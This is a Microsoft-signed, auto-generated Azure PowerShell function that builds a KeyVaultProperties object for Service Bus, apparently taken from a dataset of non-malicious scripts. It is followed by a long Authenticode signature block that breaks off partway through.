0u3SDmDG83LeC3HmJkzp0P9pBkGl6ArLlxp5sbvRLZ1GNmqZZkBdGGY1xvXoFpBR # kjhDKdIQnOt5Q+WG+FKjD98VDOSMzWZV3FBxqdwlY7VBNpsxSAGGaqN0MuFrsoFj # 0xpdinEyyHuVdwbabHn1bxGJQLnOUfi8le7djfcY6voIObvx/b2+O57X80Xrtqzm # t1ZwyIbUV5rvqeTMeKsJAewwlLYawBuI9loMXB7DXO82fAs7RFdLd2DK1nlpkVVV # IPFGbcx1yTzEepwxUiium4brm7yfQzqSnIlDT2XzXqfM/6RANZupkCMjus9AzZB9 # jCI8mgchJxJMNznC7g2WAMNHzcaDLqbpHVCnaG6elfOHRyLromId9uTBCqGMjDbc # 15HRmJq1hO15eMhdEOY4qIYX6Tbzb7DRPt1kwivGYxbQZsvxtHErcXdpCvWkkRUe # ZUt757PsGPy6H3JNXmatO9kk9cPRphqJzQ1EjWgmmvSQj74qkFN/6ShArLYG83sw # ABLPKNTQn1BtemJHQhdOLLVwLZpg3t4+KsvNg7xAE39wGLuwc6H203AyPpZY3pML # ErrgJa0srRQmzpO2x1Ro3I3H+pCECyQomGkSaBhOQvh9ecXaWFi2vVNleADqW3+7 # vrJx # SIG # End signature block
combined_dataset/train/non-malicious/sample_28_6.ps1
sample_28_6.ps1
# ---------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Code generated by Microsoft (R) AutoRest Code Generator.Changes may cause incorrect behavior and will be lost if the code # is regenerated. # ---------------------------------------------------------------------------------- <# .Synopsis Create an in-memory object for KeyVaultProperties. .Description Create an in-memory object for KeyVaultProperties. .Outputs Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Models.KeyVaultProperties .Link https://learn.microsoft.com/powershell/module/Az.ServiceBus/new-azservicebuskeyvaultpropertiesobject #> function New-AzServiceBusKeyVaultPropertiesObject { [OutputType('Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Models.KeyVaultProperties')] [CmdletBinding(PositionalBinding=$false)] Param( [Parameter(HelpMessage="Name of the Key from KeyVault.")] [string] $KeyName, [Parameter(HelpMessage="Uri of KeyVault.")] [string] $KeyVaultUri, [Parameter(HelpMessage="Version of KeyVault.")] [string] $KeyVersion, [Parameter(HelpMessage="ARM ID of user Identity selected for encryption.")] [string] $UserAssignedIdentity ) process { $Object = [Microsoft.Azure.PowerShell.Cmdlets.ServiceBus.Models.KeyVaultProperties]::New() if ($PSBoundParameters.ContainsKey('KeyName')) { $Object.KeyName = $KeyName } if ($PSBoundParameters.ContainsKey('KeyVaultUri')) { $Object.KeyVaultUri = $KeyVaultUri } if ($PSBoundParameters.ContainsKey('KeyVersion')) { $Object.KeyVersion = $KeyVersion } if ($PSBoundParameters.ContainsKey('UserAssignedIdentity')) { $Object.UserAssignedIdentity = $UserAssignedIdentity } return $Object } } # SIG # Begin signature block # MIIoOwYJKoZIhvcNAQcCoIIoLDCCKCgCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAHGZ/Sxr/1Xxu0 # ZCGulK5/AZ3DBBTtRlpDwbHPgrHhJ6CCDYUwggYDMIID66ADAgECAhMzAAADri01 # UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG # yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899 # QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82 # 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV # M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd # WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W # 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY # 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV # APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37 # ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57 # xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t # Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i # 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk # 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK # 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO # zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGgwwghoIAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA # A64wDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIJC/ # ONMbMAObeqC/u6tV6qO7zYlJNLpfP4rxVirSI82DMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAZpNwE2kkTafsO/ca/x4FUmOJhYJuPzbNh4kV # Z2alHX0XLGA5W01ahFQO3LpWfauUSz1HWshDKRpmKKAGjavn0lqtU8xcCYJ7lQPf # 9hQRet6zG7zL3FnzJQD2gWI3MlURWSWdvpgO6GhD0yr+8qNUCfN6lpjzPlamQ8UV # 61kohf85unTX7Ugh9PlAc7wuJKc8giQL7buLCKWeuXus9oaucMAD4cZCeQN6MRqM # sfGxO5IlZmsjGWfDcCXXgxdfI0b3rkZY6AAJEVpKpsmczYtlOTKS2LqxyQYi0tm4 # Q4l0nLMxDs5942mxOIiSp84ykrOUrGrVE/Ka9XuLROHKUY+UQqGCF5YwgheSBgor # BgEEAYI3AwMBMYIXgjCCF34GCSqGSIb3DQEHAqCCF28wghdrAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFRBgsqhkiG9w0BCRABBKCCAUAEggE8MIIBOAIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCAr4QGeNElqOywYENYxKlfhbkqrZatO7tQ0 # mqVSlW752AIGZjK/uv0bGBIyMDI0MDUxNjA2NDIxNC43M1owBIACAfSggdGkgc4w # gcsxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS # ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJTAjBgNVBAsT # HE1pY3Jvc29mdCBBbWVyaWNhIE9wZXJhdGlvbnMxJzAlBgNVBAsTHm5TaGllbGQg # VFNTIEVTTjpBMDAwLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUt # U3RhbXAgU2VydmljZaCCEe0wggcgMIIFCKADAgECAhMzAAAB6+AYbLW27zjtAAEA # AAHrMA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo # aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y # cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw # MB4XDTIzMTIwNjE4NDUzNFoXDTI1MDMwNTE4NDUzNFowgcsxCzAJBgNVBAYTAlVT # MRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK # ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJTAjBgNVBAsTHE1pY3Jvc29mdCBBbWVy # aWNhIE9wZXJhdGlvbnMxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVTTjpBMDAwLTA1 # RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAMEVaCHaVuBXd4mnTWiqJoUG # 5hs1zuFIqaS28nXk2sH8MFuhSjDxY85M/FufuByYg4abAmR35PIXHso6fOvGegHe # G6+/3V9m5S6AiwpOcC+DYFT+d83tnOf0qTWam4nbtLrFQMfih0WJfnUgJwqXoQbh # zEqBwMCKeKFPzGuglZUBMvunxtt+fCxzWmKFmZy8i5gadvVNj22el0KFav0QBG4K # jdOJEaMzYunimJPaUPmGd3dVoZN6k2rJqSmQIZXT5wrxW78eQhl2/L7PkQveiNN0 # Usvm8n0gCiBZ/dcC7d3tKkVpqh6LHR7WrnkAP3hnAM/6LOotp2wFHe3OOrZF+sI0 # v5OaL+NqVG2j8npuHh8+EcROcMLvxPXJ9dRB0a2Yn+60j8A3GLsdXyAA/OJ31NiM # w9tiobzLnHP6Aj9IXKP5oq0cdaYrMRc+21fMBx7EnUQfvBu6JWTewSs8r0wuDVdv # qEzkchYDSMQBmEoTJ3mEfZcyJvNqRunazYQlBZqxBzgMxoXUSxDULOAKUNghgbqt # SG518juTwv0ooIS59FsrmV1Fg0Cp12v/JIl+5m/c9Lf6+0PpfqrUfhQ6aMMp2Ohb # eqzslExmYf1+QWQzNvphLOvp5fUuhibc+s7Ul5rjdJjOUHdPPzg6+5VJXs1yJ1W0 # 2qJl5ZalWN9q9H4mP8k5AgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUdJ4FrNZVzG7i # pP07mNPYH6oB6uEwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAIN03y+g93wL5VZk # /f5bztz9Bt1tYrSw631niQQ5aeDsqaH5YPYuc8lMkogRrGeI5y33AyAnzJDLBHxY # eAM69vCp2qwtRozg2t6u0joUj2uGOF5orE02cFnMdksPCWQv28IQN71FzR0ZJV3k # GDcJaSdXe69Vq7XgXnkRJNYgE1pBL0KmjY6nPdxGABhV9osUZsCs1xG9Ja9JRt4j # YgOpHELjEFtGI1D7WodcMI+fSEaxd8v7KcNmdwJ+zM2uWBlPbheCG9PNgwdxeKgt # Vij/YeTKjDp0ju5QslsrEtfzAeGyLCuJcgMKeMtWwbQTltHzZCByx4SHFtTZ3VFU # dxC2RQTtb3PFmpnr+M+ZqiNmBdA7fdePE4dhhVr8Fdwi67xIzM+OMABu6PBNrClr # MsG/33stEHRk5s1yQljJBCkRNJ+U3fqNb7PtH+cbImpFnce1nWVdbV/rMQIB4/71 # 3LqeZwKtVw6ptAdftmvxY9yCEckAAOWbkTE+HnGLW01GT6LoXZr1KlN5Cdlc/nTD # 4mhPEhJCru8GKPaeK0CxItpV4yqg+L41eVNQ1nY121sWvoiKv1kr259rPcXF+8Nm # jfrm8s6jOZA579n6m7i9jnM+a02JUhxCcXLslk6JlUMjlsh3BBFqLaq4conqW1R2 # yLceM2eJ64TvZ9Ph5aHG2ac3kdgIMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCA1AwggI4AgEBMIH5oYHRpIHOMIHLMQswCQYDVQQGEwJVUzET # MBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMV # TWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1lcmlj # YSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046QTAwMC0wNUUw # LUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2WiIwoB # ATAHBgUrDgMCGgMVAIAGiXW7XDDBiBS1SjAyepi9u6XeoIGDMIGApH4wfDELMAkG # A1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQx # HjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9z # b2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQELBQACBQDp77InMCIY # DzIwMjQwNTE1MjIxMzU5WhgPMjAyNDA1MTYyMjEzNTlaMHcwPQYKKwYBBAGEWQoE # ATEvMC0wCgIFAOnvsicCAQAwCgIBAAICDU0CAf8wBwIBAAICE5YwCgIFAOnxA6cC # AQAwNgYKKwYBBAGEWQoEAjEoMCYwDAYKKwYBBAGEWQoDAqAKMAgCAQACAwehIKEK # MAgCAQACAwGGoDANBgkqhkiG9w0BAQsFAAOCAQEAcKeEVuZt5XMB25+5vEnDbX45 # QagyMy1XmABnOVoIeY/Tp5g7Fbo7nRidup9PiKaBG0LAf7JKfbJUBybOe8aV80ad # atedKp9PhyOf/4m0pMU36Vd3N8VHVXDP4SVZZapeI60RWMjkkiokSUA+/mFiNuj9 # vtuuTo2OqXmXQL4nA29Qo+pCb0gjEldIkIz+Pd3yunK5jYw1I8ttxSpvg8btF0Td # +1Oxjc5eUNnunKtdfzKumI0dVk2RoI1wSDK110ObaF3j+58fQ3hVL6QYTuvvOwLf # s2ofv1pkPfHzwTI+u/y1sk9PaONx6DJgZPnDQm2a1GzdSf0XLtHKhgKo62oWvzGC # BA0wggQJAgEBMIGTMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u # MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp # b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB # 6+AYbLW27zjtAAEAAAHrMA0GCWCGSAFlAwQCAQUAoIIBSjAaBgkqhkiG9w0BCQMx # DQYLKoZIhvcNAQkQAQQwLwYJKoZIhvcNAQkEMSIEINh1vAu+jHFzzZ5C9wBc/8iX # 7eqj4tXtj6a4OW2JhVoeMIH6BgsqhkiG9w0BCRACLzGB6jCB5zCB5DCBvQQgzrdr # vl9pA+F/xIENO2TYNJSAht2LNezPvqHUl2EsLPgwgZgwgYCkfjB8MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQg # VGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAevgGGy1tu847QABAAAB6zAiBCAVBgpr # Sq7QCCT+zfZdMFoEWfUblMYHYk3tf/EoCr+XNTANBgkqhkiG9w0BAQsFAASCAgCT # gAC6iSjAk16GmKm/llF0L2f2XoMfAfk4+Zl7NQFKkec/ePa38cl6w9bo6kIFgpZw # 7m0vw+7zfSSJrYiXDWYizK9oShgjmQwZkYMjzpTT8PsMyeqBtYA5cIRo120223yH # 2oqulkbROI79nkCOai7ugVeSv2bmcIjxD61Dg72EuGR7zHVp1jZPMMHiFqY3yPex # MQNLldQoLPN6PAqUJsxEE2DIq2lM5qO4jMAPHoI+bAfqCo+McLS+LKwisB3y6H3h # 913v6uJhOK/5EdMGUH4NuWOIRh7LgGscPzUgZTtQrJutNx6wpFgzX4G5ZJY/0gbw # nlfrQ9TNb2Vc8IrwoXgycA6XrRbDSf9fgc6Wa+gtz+co/7+4esIk7BslnaBbbzR9 # EHK5rDehsvurIEVV39PRH5qYTXXXzWG7qAEH6U582ArMDLYtamtvcm5YB3qpWAWN # 8L3ufvsZxBayvcHVMzYjwwlYiLRCUDkeFQoxRMU9+efDwpxvBwrnJZXMjgWDWCej # E0Fx1IIpdhJZtQnLGunXDNlKgbYxUuTZnZezvjyMhEa74DfOweh5+nNOS6A4IAkG # 